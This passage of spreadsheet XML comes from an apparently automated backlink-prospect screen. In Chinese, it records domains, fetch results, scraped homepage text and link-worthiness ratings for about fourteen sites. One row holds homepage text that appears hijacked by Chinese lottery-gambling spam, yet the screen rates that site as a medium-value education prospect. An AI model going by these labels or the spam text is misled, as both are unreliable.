      </x:c>
      <x:c r="M207" s="19" t="str">
        <x:v>https://papelariajardimbotanico.com.br</x:v>
      </x:c>
      <x:c r="N207" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O207" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P207" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q207" s="21" t="str"/>
      <x:c r="R207" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S207" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T207" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://papelariajardimbotanico.com.br
http://papelariajardimbotanico.com.br</x:v>
      </x:c>
    </x:row>
    <x:row r="208">
      <x:c r="A208" s="18" t="str">
        <x:v>207</x:v>
      </x:c>
      <x:c r="B208" s="19" t="str">
        <x:v>thenaturalspa.info</x:v>
      </x:c>
      <x:c r="C208" s="19" t="str">
        <x:v>https://thenaturalspa.info</x:v>
      </x:c>
      <x:c r="D208" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E208" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F208" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G208" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H208" s="19" t="str">
        <x:v>https://www.thenaturalspa.info/</x:v>
      </x:c>
      <x:c r="I208" s="19" t="str">
        <x:v>The Natural SPA Monza – Naturale come la tua bellezza</x:v>
      </x:c>
      <x:c r="J208" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K208" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L208" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M208" s="19" t="str">
        <x:v>https://www.thenaturalspa.info/</x:v>
      </x:c>
      <x:c r="N208" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O208" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P208" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q208" s="21" t="str">
        <x:v>The Natural SPA Monza – Naturale come la tua bellezza 0,00 &amp;euro; Carrello Home vetrina Chi Siamo I Trattamenti Shop LINEA SOIN DERMATOLOGIQUE LINEA TRATTAMENTO CORPO MARIA GALLAND LINEA TRATTAMENTO VISO MARIA GALLAND Shop Contattaci NEWS Menu Home vetrina Chi Siamo I Trattamenti Shop LINEA SOIN DERMATOLOGIQUE LINEA TRATTAMENTO CORPO MARIA GALLAND LINEA TRATTAMENTO VISO MARIA GALLAND Shop Contattaci NEWS Home vetrina Chi Siamo I Trattamenti Shop LINEA SOIN DERMATOLOGIQUE LINEA TRATTAMENTO CORPO MARIA GALLAND LINEA TRATTAMENTO VISO MARIA GALLAND Shop Contattaci NEWS Menu Home vetrina Chi Siamo I Trattamenti Shop LINEA SOIN DERMATOLOGIQUE LINEA TRATTAMENTO CORPO MARIA GALLAND LINEA TRATTAMENTO</x:v>
      </x:c>
      <x:c r="R208" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S208" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T208" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://thenaturalspa.info</x:v>
      </x:c>
    </x:row>
    <x:row r="209">
      <x:c r="A209" s="18" t="str">
        <x:v>208</x:v>
      </x:c>
      <x:c r="B209" s="19" t="str">
        <x:v>mpdevx3.com</x:v>
      </x:c>
      <x:c r="C209" s="19" t="str">
        <x:v>https://mpdevx3.com</x:v>
      </x:c>
      <x:c r="D209" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E209" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F209" s="20"/>
      <x:c r="G209" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H209" s="19" t="str"/>
      <x:c r="I209" s="19" t="str"/>
      <x:c r="J209" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K209" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L209" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M209" s="19" t="str">
        <x:v>https://mpdevx3.com</x:v>
      </x:c>
      <x:c r="N209" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O209" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P209" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q209" s="21" t="str"/>
      <x:c r="R209" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S209" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T209" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://mpdevx3.com
http://mpdevx3.com</x:v>
      </x:c>
    </x:row>
    <x:row r="210">
      <x:c r="A210" s="18" t="str">
        <x:v>209</x:v>
      </x:c>
      <x:c r="B210" s="19" t="str">
        <x:v>umaconferences.com</x:v>
      </x:c>
      <x:c r="C210" s="19" t="str">
        <x:v>https://umaconferences.com</x:v>
      </x:c>
      <x:c r="D210" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E210" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F210" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G210" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H210" s="19" t="str">
        <x:v>https://www.umaconferences.com/</x:v>
      </x:c>
      <x:c r="I210" s="19" t="str">
        <x:v>Home - Universal Mentors Association</x:v>
      </x:c>
      <x:c r="J210" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K210" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L210" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M210" s="19" t="str">
        <x:v>https://www.umaconferences.com/</x:v>
      </x:c>
      <x:c r="N210" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O210" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P210" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q210" s="21" t="str">
        <x:v>Home - Universal Mentors Association Skip to content Universal Mentors Association +91-85888 12338 ceo@umaconferences.com Facebook Linkedin Instagram Menu Home About us What We Do Conference Magazines Webinar All About EdTEch Blog Contact Us Menu Home About us What We Do Conference Magazines Webinar All About EdTEch Blog Contact Us India's Largest Leadership Knowledge Exchange Platform Conference UNIVERSAL MENTORS ASSOCIATION Universal Mentors Association, founded in 2019, is a cutting-edge Research-Based Media Organization with a resolute focus on revolutionizing the Education, BFSI, Human Resource, and Marketing sectors. At Universal Mentors Association, we strive to establish knowledge-ba</x:v>
      </x:c>
      <x:c r="R210" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S210" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T210" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://umaconferences.com</x:v>
      </x:c>
    </x:row>
    <x:row r="211">
      <x:c r="A211" s="18" t="str">
        <x:v>210</x:v>
      </x:c>
      <x:c r="B211" s="19" t="str">
        <x:v>hudsonvalleybabies.org</x:v>
      </x:c>
      <x:c r="C211" s="19" t="str">
        <x:v>https://hudsonvalleybabies.org</x:v>
      </x:c>
      <x:c r="D211" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E211" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F211" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G211" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H211" s="19" t="str">
        <x:v>http://hudsonvalleybabies.org/</x:v>
      </x:c>
      <x:c r="I211" s="19" t="str">
        <x:v>官方网站®澳洲的幸运5彩票实时官网结果记录体彩查询-168奖号结果预测直播计划数据 | Mommy Poppins®168幸运5澳洲结果体彩网 - Things to Do with Kids</x:v>
      </x:c>
      <x:c r="J211" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K211" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L211" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M211" s="19" t="str">
        <x:v>http://hudsonvalleybabies.org/</x:v>
      </x:c>
      <x:c r="N211" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O211" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P211" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q211" s="21" t="str">
        <x:v>官方网站正规入口网址®澳洲体彩幸运5彩票 168官方幸运5澳洲结果体彩网 澳洲体彩幸运5官网开奖结果 168澳洲的幸运5官网结果记录体彩-开奖结果预测直播计划数据 澳洲幸运体彩5五记录历史奖号查询结果 2026澳洲体彩幸运五168官方结果查询历史记录与最新人工准数据统计 中奖辅助软件APP手机版下载. From summer camps to birthday bashes—Find 168澳洲的幸运5官网结果记录体彩-开奖结果预测直播计划数据 澳洲幸运体彩5五记录历史奖号查询结果 perfect kid activities near you. Your family 官方网站®澳洲的幸运5彩票实时官网结果记录体彩查询-168奖号结果预测直播计划数据 | Mommy Poppins®168幸运5澳洲结果体彩网 - Things to Do with Kids MAKE YOUR DAY Get Listed Log In Sign Up My Profile Sign out Contact Anywhere Anywhere New York City Dallas Fort Worth Atlanta Boston Chicago Houston Miami South Florida Philadelphia Washington DC Orlando Los Angeles San Francisco Bay Area Connecticut Long Island New Jersey Westchester Get Listed Log In Sign Up My Profile Sign out Contact 官方网站®澳洲的幸运5彩票实时官网结果记录体彩查询-168奖号结果预测直播计划数据 HOME - Anywhere Activity Calendar Providers Calendar Activity Search Submit an Activity Things To Do Crafts for Kids Recipes Science for Kids Games &amp; Activities Online &amp; Virtual Parenting Parenting Guide Baby &amp; Maternity </x:v>
      </x:c>
      <x:c r="R211" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S211" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T211" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://hudsonvalleybabies.org
http://hudsonvalleybabies.org</x:v>
      </x:c>
    </x:row>
    <x:row r="212">
      <x:c r="A212" s="18" t="str">
        <x:v>211</x:v>
      </x:c>
      <x:c r="B212" s="19" t="str">
        <x:v>jatsszunk-egyutt.hu</x:v>
      </x:c>
      <x:c r="C212" s="19" t="str">
        <x:v>https://jatsszunk-egyutt.hu</x:v>
      </x:c>
      <x:c r="D212" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E212" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F212" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G212" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H212" s="19" t="str">
        <x:v>https://jatsszunk-egyutt.hu/</x:v>
      </x:c>
      <x:c r="I212" s="19" t="str">
        <x:v>Játsszunk együtt! Játékötletek óvodás gyerekeknek és szülőknek</x:v>
      </x:c>
      <x:c r="J212" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K212" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L212" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M212" s="19" t="str">
        <x:v>https://jatsszunk-egyutt.hu/</x:v>
      </x:c>
      <x:c r="N212" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O212" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P212" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q212" s="21" t="str">
        <x:v>Játsszunk együtt! Játékötletek óvodás gyerekeknek, ötletek óvónéniknek és szülőknek a közös együtt játszáshoz, képességfejlesztéshez. Játsszunk együtt! Játékötletek óvodás gyerekeknek és szülőknek jatsszunkegyutt.anita@gmail.com Facebook Instagram Facebook Instagram 0 Termék Helló Játékos hónapok Játéktár Webshop Oldal kiválasztása Töltsd le az ingyenes nyári ötletcsomagot, hogy a „Mit játsszunk?” kérdésre mindig legyen egy jó válaszod! Megnézem Megnézem Nyomtass egyszerűen képességfejlesztő játékokat ovis gyermekednek! 3-4 éveseknek Megnézem 5-6 éveseknek Megnézem iskolaelőkészítő Megnézem Játékos hónapok – ingyenes játékötletek Tudd meg, hogyan fejlődnek játék közben gyermeked képességei! Válassz egy témakört! Kezdődik az óvoda Megnézem Napirend, hetirend Megnézem Őszi gyümölcsök Megnézem Érzelmek Megnézem Kövesd a Játék</x:v>
      </x:c>
      <x:c r="R212" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S212" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T212" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://jatsszunk-egyutt.hu</x:v>
      </x:c>
    </x:row>
    <x:row r="213">
      <x:c r="A213" s="18" t="str">
        <x:v>212</x:v>
      </x:c>
      <x:c r="B213" s="19" t="str">
        <x:v>westlothian.org.uk</x:v>
      </x:c>
      <x:c r="C213" s="19" t="str">
        <x:v>https://westlothian.org.uk</x:v>
      </x:c>
      <x:c r="D213" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E213" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F213" s="20"/>
      <x:c r="G213" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H213" s="19" t="str"/>
      <x:c r="I213" s="19" t="str"/>
      <x:c r="J213" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K213" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L213" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M213" s="19" t="str">
        <x:v>https://westlothian.org.uk</x:v>
      </x:c>
      <x:c r="N213" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O213" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P213" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q213" s="21" t="str"/>
      <x:c r="R213" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S213" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T213" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://westlothian.org.uk
http://westlothian.org.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="214">
      <x:c r="A214" s="18" t="str">
        <x:v>213</x:v>
      </x:c>
      <x:c r="B214" s="19" t="str">
        <x:v>greatwoodfarm.co.uk</x:v>
      </x:c>
      <x:c r="C214" s="19" t="str">
        <x:v>https://greatwoodfarm.co.uk</x:v>
      </x:c>
      <x:c r="D214" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E214" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F214" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G214" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H214" s="19" t="str">
        <x:v>https://www.greatwoodfarm.co.uk/</x:v>
      </x:c>
      <x:c r="I214" s="19" t="str">
        <x:v>Nurseries in Grantham | Great Wood Farm Early Years Centre</x:v>
      </x:c>
      <x:c r="J214" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K214" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L214" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M214" s="19" t="str">
        <x:v>https://www.greatwoodfarm.co.uk/</x:v>
      </x:c>
      <x:c r="N214" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O214" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P214" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q214" s="21" t="str">
        <x:v>Purpose built nurseries in Grantham situated between the farmhouse and Great Wood at Boothby Pagnell. Nurseries in Grantham | Great Wood Farm Early Years Centre Great Wood Farm Early Years Centre ☰ Home About Us Overview Blog Our Philosophy Planning, Observations and Assessments Our Staff Our Food Opening Times Our Calendar Fees &amp; EYE Entitlement Awards &amp; Accreditations Careers The Great Outdoors Overview The Gardens The Woods &amp; Forest School The Farm The Animals Our Nursery Overview The Baby Room The Toddler Room Kindergarten Foxes Kindergarten Badgers Kindergarten Hares Sensory Room FAQs Holiday Clubs Overview Breakfast &amp; After School Club Holiday Club School Trips Overview Forest School and Farm Trips Fees and Frequently Asked Questions Learning Offer in Schools Training Overview Professi</x:v>
      </x:c>
      <x:c r="R214" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S214" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T214" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://greatwoodfarm.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="215">
      <x:c r="A215" s="18" t="str">
        <x:v>214</x:v>
      </x:c>
      <x:c r="B215" s="19" t="str">
        <x:v>crosswalk.com</x:v>
      </x:c>
      <x:c r="C215" s="19" t="str">
        <x:v>https://crosswalk.com</x:v>
      </x:c>
      <x:c r="D215" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E215" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F215" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G215" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H215" s="19" t="str">
        <x:v>https://www.crosswalk.com/</x:v>
      </x:c>
      <x:c r="I215" s="19" t="str">
        <x:v>Crosswalk - Grow in Faith with Daily Christian Living Articles | Crosswalk.com</x:v>
      </x:c>
      <x:c r="J215" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K215" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L215" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M215" s="19" t="str">
        <x:v>https://www.crosswalk.com/</x:v>
      </x:c>
      <x:c r="N215" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O215" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P215" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q215" s="21" t="str">
        <x:v>Crosswalk - Grow in Faith with Daily Christian Living Articles | Crosswalk.com Open main menu Go Ad-Free Join Plus Log In Trending: Plus Forums Crossword Devotionals Your Nightly Scripture News Video Prayer Back to School Your Nightly Prayer Join PLUS Log In Home | Forums Crossword Devotionals Your Daily Prayer Your Nightly Prayer The Crosswalk Devotional Your Daily Bible Verse Video Devotional Plus Marriage Devo Plus Encouragement for Today See All Devotionals Faith Spiritual Life Bible Study Prayer Women Men Seniors Health &amp; Wellness Mental Health Family Marriage Divorce and Remarriage Singles Parenting Grandparenting Homeschool Career Finances Church Pastors / Leadership Christianity Q&amp;A </x:v>
      </x:c>
      <x:c r="R215" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S215" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T215" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://crosswalk.com</x:v>
      </x:c>
    </x:row>
    <x:row r="216">
      <x:c r="A216" s="18" t="str">
        <x:v>215</x:v>
      </x:c>
      <x:c r="B216" s="19" t="str">
        <x:v>rlavr.com</x:v>
      </x:c>
      <x:c r="C216" s="19" t="str">
        <x:v>https://rlavr.com</x:v>
      </x:c>
      <x:c r="D216" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E216" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F216" s="20"/>
      <x:c r="G216" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H216" s="19" t="str"/>
      <x:c r="I216" s="19" t="str"/>
      <x:c r="J216" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K216" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L216" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M216" s="19" t="str">
        <x:v>https://rlavr.com</x:v>
      </x:c>
      <x:c r="N216" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O216" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P216" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q216" s="21" t="str"/>
      <x:c r="R216" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S216" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T216" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://rlavr.com
http://rlavr.com</x:v>
      </x:c>
    </x:row>
    <x:row r="217">
      <x:c r="A217" s="18" t="str">
        <x:v>216</x:v>
      </x:c>
      <x:c r="B217" s="19" t="str">
        <x:v>twinkl.com.ph</x:v>
      </x:c>
      <x:c r="C217" s="19" t="str">
        <x:v>https://twinkl.com.ph</x:v>
      </x:c>
      <x:c r="D217" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E217" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F217" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G217" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H217" s="19" t="str">
        <x:v>https://www.twinkl.com.ph/</x:v>
      </x:c>
      <x:c r="I217" s="19" t="str"/>
      <x:c r="J217" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K217" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L217" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M217" s="19" t="str">
        <x:v>https://www.twinkl.com.ph/</x:v>
      </x:c>
      <x:c r="N217" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O217" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P217" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q217" s="21" t="str"/>
      <x:c r="R217" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S217" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T217" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.ph</x:v>
      </x:c>
    </x:row>
    <x:row r="218">
      <x:c r="A218" s="18" t="str">
        <x:v>217</x:v>
      </x:c>
      <x:c r="B218" s="19" t="str">
        <x:v>breastfeeding-assistance.com</x:v>
      </x:c>
      <x:c r="C218" s="19" t="str">
        <x:v>https://breastfeeding-assistance.com</x:v>
      </x:c>
      <x:c r="D218" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E218" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F218" s="20"/>
      <x:c r="G218" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H218" s="19" t="str"/>
      <x:c r="I218" s="19" t="str"/>
      <x:c r="J218" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K218" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L218" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M218" s="19" t="str">
        <x:v>https://breastfeeding-assistance.com</x:v>
      </x:c>
      <x:c r="N218" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O218" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P218" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q218" s="21" t="str"/>
      <x:c r="R218" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S218" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T218" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://breastfeeding-assistance.com
http://breastfeeding-assistance.com</x:v>
      </x:c>
    </x:row>
    <x:row r="219">
      <x:c r="A219" s="18" t="str">
        <x:v>218</x:v>
      </x:c>
      <x:c r="B219" s="19" t="str">
        <x:v>myshopify.com</x:v>
      </x:c>
      <x:c r="C219" s="19" t="str">
        <x:v>https://myshopify.com</x:v>
      </x:c>
      <x:c r="D219" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E219" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F219" s="20" t="str">
        <x:v>404</x:v>
      </x:c>
      <x:c r="G219" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H219" s="19" t="str">
        <x:v>https://myshopify.com/</x:v>
      </x:c>
      <x:c r="I219" s="19" t="str"/>
      <x:c r="J219" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K219" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L219" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M219" s="19" t="str">
        <x:v>https://myshopify.com/</x:v>
      </x:c>
      <x:c r="N219" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O219" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P219" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q219" s="21" t="str"/>
      <x:c r="R219" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S219" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T219" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://myshopify.com</x:v>
      </x:c>
    </x:row>
    <x:row r="220">
      <x:c r="A220" s="18" t="str">
        <x:v>219</x:v>
      </x:c>
      <x:c r="B220" s="19" t="str">
        <x:v>twinkl.ar</x:v>
      </x:c>
      <x:c r="C220" s="19" t="str">
        <x:v>https://twinkl.ar</x:v>
      </x:c>
      <x:c r="D220" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E220" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F220" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G220" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H220" s="19" t="str">
        <x:v>https://www.twinkl.ar/</x:v>
      </x:c>
      <x:c r="I220" s="19" t="str"/>
      <x:c r="J220" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K220" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L220" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M220" s="19" t="str">
        <x:v>https://www.twinkl.ar/</x:v>
      </x:c>
      <x:c r="N220" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O220" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P220" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q220" s="21" t="str"/>
      <x:c r="R220" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S220" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T220" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.ar</x:v>
      </x:c>
    </x:row>
    <x:row r="221">
      <x:c r="A221" s="18" t="str">
        <x:v>220</x:v>
      </x:c>
      <x:c r="B221" s="19" t="str">
        <x:v>rgsoftwares.com</x:v>
      </x:c>
      <x:c r="C221" s="19" t="str">
        <x:v>https://rgsoftwares.com</x:v>
      </x:c>
      <x:c r="D221" s="20" t="str">
        <x:v>1</x:v>
